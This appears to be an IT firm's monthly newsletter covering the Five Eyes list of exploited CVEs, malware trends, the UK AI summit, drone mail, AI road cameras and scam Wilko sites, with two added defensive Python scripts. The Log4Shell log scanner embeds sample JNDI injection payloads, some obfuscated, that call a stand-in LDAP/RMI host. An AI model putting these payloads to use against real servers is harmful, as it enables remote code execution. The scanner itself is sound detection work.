August 2023 Newsletter

Posted By: Mark, Saturday 16th September 2023

This month: Vulnerability report from Five Eyes collective; rising malware threat; AI safety summit coming to the UK; deliveries by drone; AI road safety cameras catch hundreds; warning over scam Wilko websites exploiting the company’s administration.


Five Eyes Annual Vulnerability Report

Five Eyes, the intelligence and cyber security alliance of the USA, Australia, Canada, New Zealand and the United Kingdom, has released its latest list of routinely exploited vulnerabilities. Most of the flaws are years old, yet they are still being actively exploited against organisations that still have unpatched systems.

Top Routinely Exploited Vulnerabilities

  1. CVE-2018-13379. This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
  2. CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS), Microsoft’s web server. CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
  3. CVE-2021-40539. This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
  4. CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
  5. CVE-2021-44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity. Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021-44228 through the first half of 2022.
  6. CVE-2022-22954, CVE-2022-22960. These vulnerabilities affect VMware Workspace ONE Access, Identity Manager and other VMware products. CVE-2022-22954 is a server-side template injection that a malicious cyber actor with network access can trigger to achieve remote code execution; CVE-2022-22960 is a privilege escalation flaw that was chained with it to gain root on the appliance. Exploitation of CVE-2022-22954 and CVE-2022-22960 began in early 2022 and attempts continued throughout the remainder of the year.
  7. CVE-2022-1388. This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication on F5 BIG-IP application delivery and security software and run arbitrary system commands on the device.
  8. CVE-2022-30190. This vulnerability, widely known as Follina, impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit it to take control of an affected system, typically by persuading a user to open a crafted document that invokes MSDT.
  9. CVE-2022-26134. This critical RCE vulnerability affects Atlassian Confluence Server and Data Center. The vulnerability, which was likely exploited as a zero-day before public disclosure in June 2022, is an OGNL injection flaw related to the older Confluence vulnerability CVE-2021-26084, which cyber actors also exploited in 2022.
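Log4Shell (item 5) is a useful case for showing what “a specially crafted request” looks like in practice, and how attackers disguise it. The script below is an added example written for this newsletter, not part of the Five Eyes advisory or any vendor tooling. It scans web server access log lines for Log4j JNDI lookups: it first undoes URL percent-encoding, then collapses the `${lower:...}`, `${upper:...}` and `${...:-x}` nesting tricks attackers use to hide the string “jndi”, and finally reports the payload each line resolves to. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Log4j lookups that attackers nest to hide the literal string "jndi".
# Each is reduced to the literal it would evaluate to. (Added example:
# these are the public Log4Shell evasion forms, not text from the advisory.)
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")   # ${::-j}, ${env:NOPE:-j}
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.IGNORECASE)


def decode(s: str, rounds: int = 3) -> str:
    """Undo URL percent-encoding, including double-encoding, until stable."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def normalise(s: str, rounds: int = 20) -> str:
    """Collapse nested lower/upper/default lookups until nothing changes."""
    for _ in range(rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), s)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def scan_log(lines):
    """Return (line_number, normalised_payload) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalise(decode(line))
        m = _JNDI.search(norm)
        if m:
            hits.append((n, m.group(0)))
    return hits


# Constructed access-log lines (combined log format). Lines 2-5 carry a
# Log4Shell probe in four disguises; lines 1 and 6 are benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.99:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.99:1389/b}"',
    '198.51.100.8 - - [10/Dec/2021:10:00:04 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.99%3A1099%2Fc%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.9 - - [10/Dec/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.99:1389/d}"',
    '203.0.113.6 - - [10/Dec/2021:10:00:06 +0000] "GET /docs/${version}/ HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for n, payload in scan_log(SAMPLE_LOG):
        print(f"line {n}: {payload}")
```

Run as-is it prints the four lines that carry a lookup and the `${jndi:...}` payload each one resolves to; point `scan_log` at real access logs or a SIEM export for the same triage. A hit shows only that an attempt was made, not that it succeeded, so follow up by checking whether the target was running a vulnerable Log4j 2 build and whether it made an outbound LDAP or RMI connection to the host named in the payload.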

As well as best-practice advice for vendors and developers, Five Eyes gives its usual sage advice for organisations, including:

  • Keep software, operating systems, applications and firmware on IT network assets up to date, and apply vendor-advised workarounds where patches aren’t immediately available
  • Keep all systems, software and services catalogued
  • Monitor all networks for anomalies
  • Keep regular, secure backups
  • Maintain a tested cyber incident recovery plan
  • Implement zero trust architecture
  • Keep systems properly configured
  • Regularly review valid user access

If you’re a business in Stockton-on-Tees, Middlesbrough, Durham, Newcastle, Sunderland — and all the surrounding areas of the North East Of England — and need your IT systems reviewing, get in touch.



Public Sector Malware Surge

The latest quarterly BlackBerry Global Threat Intelligence Report finds governments and public services are facing 40% more cyberattacks than they did in the previous quarter.

Between March and May of this year BlackBerry Cybersecurity solutions stopped 1,528,488 cyberattacks, and around 225,000 of those involved previously unseen malware samples, a 13% increase in unique samples on the previous quarter.

Report Highlights

90 days by the numbers: From March 2023 to May 2023, threat actors deployed approximately 11.5 attacks per minute. These threats included roughly 1.7 novel malware samples per minute, indicating a 13% increase from the previous reporting period’s average. This increase demonstrates that attackers are diversifying their tools in an attempt to bypass defensive controls.

Most targeted industries: The healthcare and financial services industries continue to be among the most targeted sectors. They are lucrative targets for cybercriminals because of the valuable data they hold and the critical services they provide; ransomware and infostealers are the common threats.

Government entities and then critical infrastructure are the next-most targeted. Cyber security researchers attribute the volume of attacks on schools, public utilities, transport networks and the like to the limited cyber defence resources invested in publicly funded organisations. These sectors are also prime targets for state-sponsored groups as well as ordinary cybercriminals.

Remote access increases cyber risk: Financial institutions face persistent threats due to their economic significance and concentration of sensitive data. The report details these challenges, exacerbated by the growing availability of commodity malware for ransomware attacks and the rise in malware targeting digital and mobile banking services. Researchers uncovered mobile threats including data exfiltration, financial app spoofing and SMS text interceptors. Mobile malware is on the rise.

Country-specific cyberattacks: In the second quarter of 2023, APT28 and the Lazarus Group — state-sponsored threat actors linked to Russia and North Korea, respectively — became extremely active. These actors typically target the United States, Europe, and South Korea, with a focus on targeting government agencies, military organizations, businesses, and financial institutions. They also frequently adapt their techniques to make their attacks harder to detect and defend against.

Ismael Valenzuela, Vice President of Threat Research and Intelligence at BlackBerry, said:

“Governments and public services, such as public transit, electricity, water services, schools, and non-profit organisations, stand as unfortunate bullseyes for cybercriminals and other threat actors, whose attacks seek to wreak maximum havoc and who often times face very little resistance.

“With limited resources and immature cyber defense programs, these organisations are struggling to defend against the double pronged threat of both nation states and cybercriminals. Now, more than ever, they need access to actionable cyber intelligence to direct and strengthen their security strategies, while safeguarding the vital services, institutions, and trust upon which our societies thrive.”

While this report is focused on the threat to public and government entities, the threats mentioned in the report are also applicable to every sector and business in operation. Your company needs to implement robust cyber security practices to keep your important data safe. If you’re a business in Teesside, Durham, Tyne & Wear, Northumberland, North Yorkshire or anywhere around the North East of England, get in touch about our services.



Global AI Safety Summit Coming To UK

The UK will host the world’s first summit on artificial intelligence safety in November. World leaders, big tech chiefs, and leading researchers in the field of artificial intelligence will gather at Bletchley Park on the 1st and 2nd of November.

While supporters of AI laud its promise to improve productivity and automate labour-intensive processes across the public and private sectors, concerned voices warn of risks that AI could amplify existing bias and propagate misinformation.

The conference will look at the risks of AI and how these can be mitigated through internationally coordinated action, where global players will ‘explore and build consensus on rapid, international action to advance safety at the frontier of AI technology’. It will build on ongoing work at international forums including the OECD, Global Partnership on AI, Council of Europe, and the UN and standards-development organisations, as well as the recently agreed G7 Hiroshima AI Process.

Roots Of AI Within Codebreakers Team

Bletchley Park is a symbolic location in the history of computer science development, primarily known to the general public as the home of the British Enigma codebreakers and the genius of Alan Turing. The roots of AI can be traced back to the leading minds who worked at Bletchley during the Second World War, with codebreakers Jack Good and Donald Michie among those who went on to write extensive works on the technology.

UK Wants To Be An AI Tech Leader

Prime Minister, Rishi Sunak, wants to promote the UK’s AI credentials in a tech-focused future. Task forces have been set up and investment pledges made.

The Prime Minister said:

“To fully embrace the extraordinary opportunities of artificial intelligence, we must grip and tackle the risks to ensure it develops safely in the years ahead.

“With the combined strength of our international partners, thriving AI industry and expert academic community, we can secure the rapid international action we need for the safe and responsible development of AI around the world.”

Technology Secretary, Michelle Donelan, said:

“International collaboration is the cornerstone of our approach to AI regulation, and we want the summit to result in leading nations and experts agreeing on a shared approach to its safe use.

“AI is already improving lives from new innovations in healthcare to supporting efforts to tackle climate change, and November’s summit will make sure we can all realise the technology’s huge benefits safely and securely for decades to come.”

Foreign Secretary, James Cleverly, said:

“No country will be untouched by AI, and no country alone will solve the challenges posed by this technology. In our interconnected world, we must have an international approach.”

Iain Standen, CEO of the Bletchley Park Trust, said:

“Bletchley Park Trust is immensely privileged to have been chosen as the venue for the first major international summit on AI safety this November, and we look forward to welcoming the world to our historic site.

“It is fitting that the very spot where leading minds harnessed emerging technologies to influence the successful outcome of World War Two will, once again, be the crucible for international co-ordinated action.

“We are incredibly excited to be providing the stage for discussions on global safety standards, which will help everyone manage and monitor the risks of artificial intelligence.”

You can read the full UK Government press release here.



UK’s First Drone Mail Delivery Service

The BBC reports that Orkney has become the first location in the UK to have mail delivered by drone. The three-month trial sees the creation of ‘Orkney I-Port’, in a collaboration between Royal Mail and Skyports drones, and in partnership with Orkney Islands Council Harbour Authority and Loganair, to perform a daily distribution of letters and parcels across three islands.

While the trial is pencilled in for three months, Royal Mail says this is the first UK drone delivery project that could run on a permanent basis under the existing regulatory framework. Orkney’s geography makes that possible: the islands are close enough together that flights can be conducted under extended visual line of sight (EVLOS) permissions rather than the beyond visual line of sight (BVLOS) permissions most drone delivery routes would need.

The I-Port operation should greatly improve service levels and access for rural communities, significantly shortening delivery times to Graemsay and Hoy, says Royal Mail.

The weather and geography of Orkney can cause interruptions to the delivery service as poor weather can affect the ferry schedules on safety grounds. The inter-island electric drone delivery will also bring safety improvements and emissions reductions.

Chris Paxton, head of drone trials at Royal Mail, said:

“We are proud to be working with Skyports to deliver via drone to some of the more remote communities that we serve in the UK.

“Using a fully electric drone supports Royal Mail’s continued drive to reduce emissions associated with our operations, whilst connecting the island communities we deliver to.”

Alex Brown, director of Skyports Drone Services, said:

“By leveraging drone technology, we are revolutionising mail services in remote communities, providing more efficient and timely delivery, and helping to reduce the requirement for emissions-producing vehicles.

“We’re pleased to be once again partnering with Royal Mail to demonstrate how drone operations can benefit UK logistics on this project.”



New AI Camera Catches Hundreds Of Motorists

A new, state of the art, artificial intelligence-based road safety system caught around 300 law-breaking drivers in its first three days of operation on one of Cornwall’s busiest roads.

The A30, in Cornwall, saw the first ever use of the road monitoring system, where it detected 180 seat belt offences, along with 117 mobile phone offences, in those first 72 hours of use. It has gone on to capture more than 1,500 drivers in its first full week.

The new free-standing camera system can be moved and redeployed easily to different locations around Devon and Cornwall. While AI is used to detect possible offences, every recording is reviewed by human operators before any action is taken. They decide whether an offence has actually occurred and then send out a warning letter or notice of intended prosecution, as appropriate.

Adrian Leisk, Head of Road Safety for Devon & Cornwall Police, said:

“When we trialled this technology last year, we were disappointed by the number of drivers detected not wearing seatbelts – particularly as we continue to see serious and fatal collisions involving people who were not wearing seatbelts, a third of all fatal collisions in 2021 involved someone who wasn’t wearing a seatbelt.

“The early results from our latest deployment show that there is also a problem with mobile phone use behind the wheel, which is both dangerous and illegal.

“While we know the majority of drivers in Devon and Cornwall are safe, respectful and conscientious motorists, sadly putting people’s lives at risk.

“We are employing this new technology to send a clear message to anyone who continues to use their phone behind the wheel – you will get caught.”



Fake Wilko Websites Warning

Shoppers are being cautioned about a number of scam websites pretending to be the retailer which recently fell into administration. The fake sites are attempting to deceive bargain hunters by offering heavily discounted goods.

Administrators PwC announced they were attempting to shut down at least ten fake websites while continuing their search for a buyer. The genuine Wilko website was closed as soon as the administrators took control; products are only available to buy in the physical stores. No goods are being sold online, no online orders are being fulfilled, and there are no delivery or click-and-collect options.

Retail Gazette reports that a scam site was posting discount deals on social media. They were offering a sofa — a category that Wilko does not sell — for £4.99 and discounts of “up to 90%”, telling consumers that “because there are still a lot of goods piled up in the warehouse, we are going to sell at a super low price”.

A spokesperson for PwC, said:

“We have been made aware of a number of fake Wilko websites which are offering Wilko products at heavily discounted prices.

“These websites are not genuine and have been set up to scam users, the only legitimate Wilko website is www.wilko.com.

“We are in the process of working with the relevant authorities to have these websites removed. We would like to remind our customers that all Wilko sales are now in-store and you are unable to purchase items online.”

Lisa Webb, consumer law expert at Which?, said:

“Criminals are always on the lookout for new ways to part people from their hard-earned cash and these dodgy websites offering heavily discounted Wilko goods are no exception.

“If you are keen to get a bargain from Wilko, you can only buy in-store at the moment so anything online should be taken with a pinch of salt. If you or a loved one do fall victim to a scam then contact your bank immediately and report it to Action Fraud or Police Scotland.”

How To Avoid Scam Websites

Trading Standards has the following advice about staying safe when shopping online:

  • Make sure that the website address (URL) is correct and matches the site you intended to visit. Copycat websites often have similar URLs to the legitimate sites, but with small differences such as spelling errors or a different domain extension
  • Check for the padlock icon in the address bar which indicates the connection is secure. However, don’t rely on the padlock icon alone
  • Legitimate websites usually have contact information such as a phone number, email address, or physical address. But some copycat websites might have contact details, so don’t rely on them alone either
  • Be wary of websites that have poor grammar, spelling errors or low-quality images
  • Check for reviews of the website. These can give you an idea of other people’s experiences with the site and whether it is trustworthy
  • Don’t rush. Take your time to research the website and make sure it is legitimate before making any transactions or providing personal information
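The first bullet, checking the address carefully, is the one people get wrong most often because the differences are deliberately small. As an added example (not Trading Standards’ advice or code, and not anything PwC or Wilko published), the Python script below applies a few simple tests to a list of constructed URLs against the one legitimate domain PwC named, wilko.com: is the brand being used as a subdomain of some other site, is it the same name on a different domain extension, is it embedded in a longer name, or is it one or two characters away once common digit-for-letter swaps are undone? The sample URLs, the small public-suffix table and the function names are assumptions made for illustration.

```python
from urllib.parse import urlsplit

LEGIT = "wilko.com"   # the only genuine domain, per the PwC statement

# Two-label public suffixes this example knows about. A real implementation
# should use the full Public Suffix List; this short table is a simplification.
TWO_LABEL_SUFFIXES = {"co.uk", "org.uk", "ac.uk", "gov.uk", "com.au", "co.nz"}

# Character swaps commonly used in typosquats, folded back to the letters
# they imitate before comparing.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def registrable_domain(host: str) -> str:
    """'www.wilko.com' -> 'wilko.com'; 'shop.wllko.co.uk' -> 'wllko.co.uk'."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def fold(label: str) -> str:
    """Replace look-alike characters with the letters they imitate."""
    for fake, real in HOMOGLYPHS:
        label = label.replace(fake, real)
    return label


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url: str, legit: str = LEGIT) -> str:
    """Label a URL by how its host relates to the legitimate domain."""
    host = (urlsplit(url).hostname or "").lower()
    reg = registrable_domain(host)
    brand = legit.split(".")[0]      # "wilko"
    name = reg.split(".")[0]         # the part a shopper actually reads
    if reg == legit:
        return "genuine"
    if f".{legit}." in f".{host}.":  # e.g. www.wilko.com.deals-outlet.top
        return "lookalike: brand as a subdomain of " + reg
    if name == brand:                # e.g. wilko.shop
        return "lookalike: different domain extension"
    if brand in name:                # e.g. wilko-sale.shop
        return "lookalike: brand embedded in " + reg
    if levenshtein(fold(name), brand) <= 2:   # e.g. wilk0.com, wllko.co.uk
        return "typosquat: " + reg
    return "unrelated"


# Constructed URLs for illustration; none of these fake hosts is a real site.
SAMPLE_URLS = [
    "https://www.wilko.com/",
    "https://www.wilko.com.deals-outlet.top/sale",
    "https://wilko.shop/",
    "https://wilko-sale.shop/",
    "https://wilk0.com/",
    "https://wllko.co.uk/",
    "https://argos.co.uk/",
]


def check_urls(urls):
    """Map each URL to its classification."""
    return {u: classify(u) for u in urls}


if __name__ == "__main__":
    for u, label in check_urls(SAMPLE_URLS).items():
        print(f"{label:45} {u}")
```

These are exactly the checks the padlock does not make for you: a scam site can obtain a TLS certificate for wilko-sale.shop just as easily as the real retailer can for wilko.com, so the padlock only confirms that the connection to whatever domain is shown is encrypted, not that the domain is the one you meant to visit.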

Stay safe.